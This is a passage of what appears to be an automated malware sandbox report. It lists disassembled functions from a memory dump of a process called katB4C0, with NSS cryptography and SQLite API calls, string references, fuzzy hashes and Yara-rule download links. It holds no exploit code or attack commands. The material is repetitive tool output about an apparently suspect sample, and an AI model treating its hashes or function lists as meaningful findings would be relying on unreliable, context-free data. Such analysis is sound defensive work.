                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Token$CopyInformationLengthProcessmalloc$AllocateCloseCurrentErrorHandleInitializeLastOpenPrint
                                                                        • String ID: _PR_NT_InitSids: OpenProcessToken() failed. Error: %d
                                                                        • API String ID: 3748115541-1216436346
                                                                        • Opcode ID: ce630be603ef8ee317bde27a4816b30556d53bd22fff77fe579264fe277694bb
                                                                        • Instruction ID: 57e8fb95955f926797412e949bac9819d6fb20ffe0257fe337dde4dd585774f6
                                                                        • Opcode Fuzzy Hash: ce630be603ef8ee317bde27a4816b30556d53bd22fff77fe579264fe277694bb
                                                                        • Instruction Fuzzy Hash: 283175B1A00218AFEF11EF66CD48BBA7BB8FF49349F044169F60992151E73059D4CF65
                                                                        Function 6CB03D00 Relevance: 24.9, APIs: 10, Strings: 4, Instructions: 446COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __aulldiv.LIBCMT ref: 6CB03DFB
                                                                        • __allrem.LIBCMT ref: 6CB03EEC
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB03FA3
                                                                        • memcpy.VCRUNTIME140(?,?,00000001), ref: 6CB04047
                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CB040DE
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB0415F
                                                                        • __allrem.LIBCMT ref: 6CB0416B
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB04288
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB042AB
                                                                        • __allrem.LIBCMT ref: 6CB042B7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$memcpy$__aulldiv
                                                                        • String ID: %02d$%03d$%04d$%lld
                                                                        • API String ID: 703928654-3678606288
                                                                        • Opcode ID: fbdcc82982b8b1d345b999a77e8df5c68a3259c1c6de27b14147db0d1eb4e79b
                                                                        • Instruction ID: 6078dfd72a78e657d3691ac1c0f732f085fdbad977ebe5b2c8f6a10580fe274b
                                                                        • Opcode Fuzzy Hash: fbdcc82982b8b1d345b999a77e8df5c68a3259c1c6de27b14147db0d1eb4e79b
                                                                        • Instruction Fuzzy Hash: 82F1E271B087809FD715CF38C881A6BBBFAEF95344F148A2DF485A7651E734E8858B42
                                                                        Function 6CAB1C30 Relevance: 23.2, APIs: 3, Strings: 10, Instructions: 485COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CAB1D58
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CAB1EFD
                                                                        • sqlite3_exec.NSS3(00000000,00000000,Function_00007370,?,00000000), ref: 6CAB1FB7
                                                                        Strings
                                                                        • table, xrefs: 6CAB1C8B
                                                                        • attached databases must use the same text encoding as main database, xrefs: 6CAB20CA
                                                                        • no more rows available, xrefs: 6CAB2264
                                                                        • sqlite_master, xrefs: 6CAB1C61
                                                                        • unsupported file format, xrefs: 6CAB2188
                                                                        • unknown error, xrefs: 6CAB2291
                                                                        • sqlite_temp_master, xrefs: 6CAB1C5C
                                                                        • abort due to ROLLBACK, xrefs: 6CAB2223
                                                                        • another row available, xrefs: 6CAB2287
                                                                        • SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 6CAB1F83
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_byteswap_ulongsqlite3_exec
                                                                        • String ID: SELECT*FROM"%w".%s ORDER BY rowid$abort due to ROLLBACK$another row available$attached databases must use the same text encoding as main database$no more rows available$sqlite_master$sqlite_temp_master$table$unknown error$unsupported file format
                                                                        • API String ID: 563213449-2102270813
                                                                        • Opcode ID: a3188d774bd616c9965961b20f60a4960958fd99583c9f08a4862b131867dbb3
                                                                        • Instruction ID: bf3a0920e1c73c2f9f72ede188286058ee74d159a0e67150c50512358342beee
                                                                        • Opcode Fuzzy Hash: a3188d774bd616c9965961b20f60a4960958fd99583c9f08a4862b131867dbb3
                                                                        • Instruction Fuzzy Hash: D012F8706083418FD705CF19C08476AB7F6BF85318F18866EE999ABB51D731EC85CB92
                                                                        Function 6CB3FC80 Relevance: 19.8, APIs: 13, Instructions: 311COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PK11_HPKE_NewContext.NSS3(?,?,?,00000000,00000000), ref: 6CB3FD06
                                                                          • Part of subcall function 6CB3F670: PORT_ZAlloc_Util.NSS3(00000038), ref: 6CB3F696
                                                                          • Part of subcall function 6CB3F670: PK11_FreeSymKey.NSS3(?,?,?), ref: 6CB3F789
                                                                          • Part of subcall function 6CB3F670: SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?), ref: 6CB3F796
                                                                          • Part of subcall function 6CB3F670: free.MOZGLUE(00000000,?,?,?,?,?), ref: 6CB3F79F
                                                                          • Part of subcall function 6CB3F670: SECITEM_DupItem_Util.NSS3 ref: 6CB3F7F0
                                                                          • Part of subcall function 6CB63440: PK11_GetAllTokens.NSS3 ref: 6CB63481
                                                                          • Part of subcall function 6CB63440: PR_SetError.NSS3(00000000,00000000), ref: 6CB634A3
                                                                          • Part of subcall function 6CB63440: TlsGetValue.KERNEL32 ref: 6CB6352E
                                                                          • Part of subcall function 6CB63440: EnterCriticalSection.KERNEL32(?), ref: 6CB63542
                                                                          • Part of subcall function 6CB63440: PR_Unlock.NSS3(?), ref: 6CB6355B
                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6CB3FDAD
                                                                          • Part of subcall function 6CB6FD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CB19003,?), ref: 6CB6FD91
                                                                          • Part of subcall function 6CB6FD80: PORT_Alloc_Util.NSS3(A4686CB7,?), ref: 6CB6FDA2
                                                                          • Part of subcall function 6CB6FD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CB7,?,?), ref: 6CB6FDC4
                                                                        • SECITEM_DupItem_Util.NSS3(?), ref: 6CB3FE00
                                                                          • Part of subcall function 6CB6FD80: free.MOZGLUE(00000000,?,?), ref: 6CB6FDD1
                                                                          • Part of subcall function 6CB5E550: PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB5E5A0
                                                                        • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB3FEBB
                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6CB3FEC8
                                                                        • PK11_HPKE_DestroyContext.NSS3(00000000,00000001), ref: 6CB3FED3
                                                                        • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB3FF0C
                                                                        • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB3FF23
                                                                        • PK11_ImportSymKey.NSS3(?,?,00000004,82000105,?,00000000), ref: 6CB3FF4D
                                                                        • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB3FFDA
                                                                        • PK11_ImportSymKey.NSS3(?,0000402A,00000004,0000010C,?,00000000), ref: 6CB40007
                                                                        • PK11_CreateContextBySymKey.NSS3(?,82000105,?,?), ref: 6CB40029
                                                                        • PR_SetError.NSS3(FFFFE002,00000000), ref: 6CB40044
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: K11_$ErrorUtil$Item_$Alloc_Context$FreeImportfree$CreateCriticalDestroyEnterSectionTokensUnlockValueZfreememcpy
                                                                        • String ID:
                                                                        • API String ID: 138705723-0
                                                                        • Opcode ID: a158b1bbf6ebdcba0ec54fb4a070460b1143bfed73c042bf91c222137ac1a775
                                                                        • Instruction ID: 9f532f290a03ec1da1e4fca5f464b12164ebfac657f566bda9341d31b54003e2
                                                                        • Opcode Fuzzy Hash: a158b1bbf6ebdcba0ec54fb4a070460b1143bfed73c042bf91c222137ac1a775
                                                                        • Instruction Fuzzy Hash: 15B1D4B1604251AFE704CF29CC40A6AB7E5FF88308F548A6DF95D97A81E730E944CB52
                                                                        Function 6CB37D60 Relevance: 18.3, APIs: 12, Instructions: 299COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SECOID_FindOID_Util.NSS3(?), ref: 6CB37DDC
                                                                          • Part of subcall function 6CB707B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB18298,?,?,?,6CB0FCE5,?), ref: 6CB707BF
                                                                          • Part of subcall function 6CB707B0: PL_HashTableLookup.NSS3(?,?), ref: 6CB707E6
                                                                          • Part of subcall function 6CB707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB7081B
                                                                          • Part of subcall function 6CB707B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB70825
                                                                        • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB37DF3
                                                                        • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6CB37F07
                                                                        • PK11_GetPadMechanism.NSS3(00000000), ref: 6CB37F57
                                                                        • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6CB37F98
                                                                        • PK11_FreeSymKey.NSS3(?), ref: 6CB37FC9
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB37FDE
                                                                        • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6CB38000
                                                                          • Part of subcall function 6CB59430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6CB37F0C,?,00000000,00000000,00000000,?), ref: 6CB5943B
                                                                          • Part of subcall function 6CB59430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6CB5946B
                                                                          • Part of subcall function 6CB59430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6CB59546
                                                                        • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CB38110
                                                                        • PK11_FreeSymKey.NSS3(00000000), ref: 6CB3811D
                                                                        • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6CB3822D
                                                                        • SECKEY_DestroyPublicKey.NSS3(?), ref: 6CB3823C
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                        • String ID:
                                                                        • API String ID: 1923011919-0
                                                                        • Opcode ID: d46417077168eeff4a540c6db7500edd1fd66fe8823ef4cd98245d1e2360e652
                                                                        • Instruction ID: 317697b1ad0c0d4b317b26abbd3b3cd9f770861da9cb6017155ff42e56f32dd0
                                                                        • Opcode Fuzzy Hash: d46417077168eeff4a540c6db7500edd1fd66fe8823ef4cd98245d1e2360e652
                                                                        • Instruction Fuzzy Hash: 39C160B1D402A9DBEB21CF14CD40BEEB7B8EB05348F0481E6E81DB6641E7719E958F91
                                                                        Function 6CB61CE0 Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 401COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CB61F19
                                                                        • memcpy.VCRUNTIME140(?,?,00000020), ref: 6CB62166
                                                                        • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CB6228F
                                                                        • memcpy.VCRUNTIME140(?,?,00000010), ref: 6CB623B8
                                                                        • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CB6241C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy$Error
                                                                        • String ID: manufacturer$model$serial$token
                                                                        • API String ID: 3204416626-1906384322
                                                                        • Opcode ID: b6b0ad21379137093d72f597706b07b79d10cf8aefe605f9d51586ef3db05273
                                                                        • Instruction ID: 74af812ce5420ede8d7958d320d647cf47abb6f7967a4173b03f6eabf4e4aab1
                                                                        • Opcode Fuzzy Hash: b6b0ad21379137093d72f597706b07b79d10cf8aefe605f9d51586ef3db05273
                                                                        • Instruction Fuzzy Hash: 9102FDA2D0C7C86EFB318672C54D3D76AE0DB45328F4C166EC6DE46E83C3A859898753
                                                                        Function 6CB66C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB11C6F,00000000,00000004,?,?), ref: 6CB66C3F
                                                                          • Part of subcall function 6CBBC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CBBC2BF
                                                                        • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CB11C6F,00000000,00000004,?,?), ref: 6CB66C60
                                                                        • PR_ExplodeTime.NSS3(00000000,6CB11C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CB11C6F,00000000,00000004,?,?), ref: 6CB66C94
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                        • String ID: gfff$gfff$gfff$gfff$gfff
                                                                        • API String ID: 3534712800-180463219
                                                                        • Opcode ID: fce13eada65e788d6c00da9395efa8b36e7b7d8c305635da314ccfb5e21f44a1
                                                                        • Instruction ID: 2e81428232efa34fe65eb5dec9c6acc1cda18d895b5f7e31be634fbcfdcc78dd
                                                                        • Opcode Fuzzy Hash: fce13eada65e788d6c00da9395efa8b36e7b7d8c305635da314ccfb5e21f44a1
                                                                        • Instruction Fuzzy Hash: B0512972B016494FC718CDADDC526DEBBDAABA4310F48C23AE842DBB81D638D906C751
                                                                        Function 6CB7BD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB7BD48
                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CB7BD68
                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB7BD83
                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CB7BD9E
                                                                        • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CB7BDB9
                                                                        • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CB7BDD0
                                                                        • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CB7BDEA
                                                                        • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CB7BE04
                                                                        • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CB7BE1E
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: AlgorithmPolicy
                                                                        • String ID:
                                                                        • API String ID: 2721248240-0
                                                                        • Opcode ID: c7ab7a2c2ddfc33c27cfb4274fd8f7158b2f4c764697ea6cbc48d313e1b7584f
                                                                        • Instruction ID: 35d1ba7af3e049dbcb056c1c8fe196c6d4d6711c609b4c3c27ac8ae56fa67ee1
                                                                        • Opcode Fuzzy Hash: c7ab7a2c2ddfc33c27cfb4274fd8f7158b2f4c764697ea6cbc48d313e1b7584f
                                                                        • Instruction Fuzzy Hash: E421BFB7E002D956FB204A5AAD42B8F3278DB9174DF080428ED37EE741E61194188BB7
                                                                        Function 6CBE9D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CAA8637,?,?), ref: 6CBE9E88
                                                                        • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CAA8637), ref: 6CBE9ED6
                                                                        Strings
                                                                        • %s at line %d of [%.10s], xrefs: 6CBE9ECF
                                                                        • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CBE9EC0
                                                                        • database corruption, xrefs: 6CBE9ECA
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: _byteswap_ulongsqlite3_log
                                                                        • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                        • API String ID: 912837312-598938438
                                                                        • Opcode ID: 4ffdc0b515ee2ef2ac45cda0a32547a127f1d0ed471aa8fb176291bf39480649
                                                                        • Instruction ID: e3090c28a231b8809e3cef82b4f6992eecea1ef7e86f2d05eb40c9130e2870b5
                                                                        • Opcode Fuzzy Hash: 4ffdc0b515ee2ef2ac45cda0a32547a127f1d0ed471aa8fb176291bf39480649
                                                                        • Instruction Fuzzy Hash: 5481AE31F012558FDB04CFAAC980ADEB3F6EF4C744B158529E916AB641E730ED49CB91
                                                                        Function 6CC2CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC2D086
                                                                        • PR_Malloc.NSS3(00000001), ref: 6CC2D0B9
                                                                        • PR_Free.NSS3(?), ref: 6CC2D138
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID: FreeMallocstrlen
                                                                        • String ID: >
                                                                        • API String ID: 1782319670-325317158
                                                                        • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                        • Instruction ID: 4878a1b226361e270126657182e637ef52922531ce834928ef5924d04c4f814b
                                                                        • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                        • Instruction Fuzzy Hash: 05D17A62B446560BFB24487D8CA03EAB7939B62374F684329D522DBFE5F61DC883C341
                                                                        Function 6CBE0C40 Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820637137.000000006CC6F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820875411.000000006CC70000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820932273.000000006CC75000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_11_2_6ca90000_katB4C0.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0dddfc7ac745a55912d668e5317dfe10f8976d7800c01abd489cc5d9394a1f12
                                                                        • Instruction ID: 3ee023c0bedc05ffafc2fcafff99561dabb54d5023dc83c686cd79cac9aa6416
                                                                        • Opcode Fuzzy Hash: 0dddfc7ac745a55912d668e5317dfe10f8976d7800c01abd489cc5d9394a1f12
                                                                        • Instruction Fuzzy Hash: 0D11C1747043459FCB00DF29D88066A7BB1FF897A8F14816DD8198B701DB31E806CBA1
                                                                        Function 6CB0CC60 Relevance: .0, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000B.00000002.2818593285.000000006CA91000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CA90000, based on PE: true
                                                                        • Associated: 0000000B.00000002.2818550319.000000006CA90000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820278681.000000006CC2F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                        • Associated: 0000000B.00000002.2820576408.000000006CC6E000.00000004.00000001.01000000.0000000C.sdmpDownload File
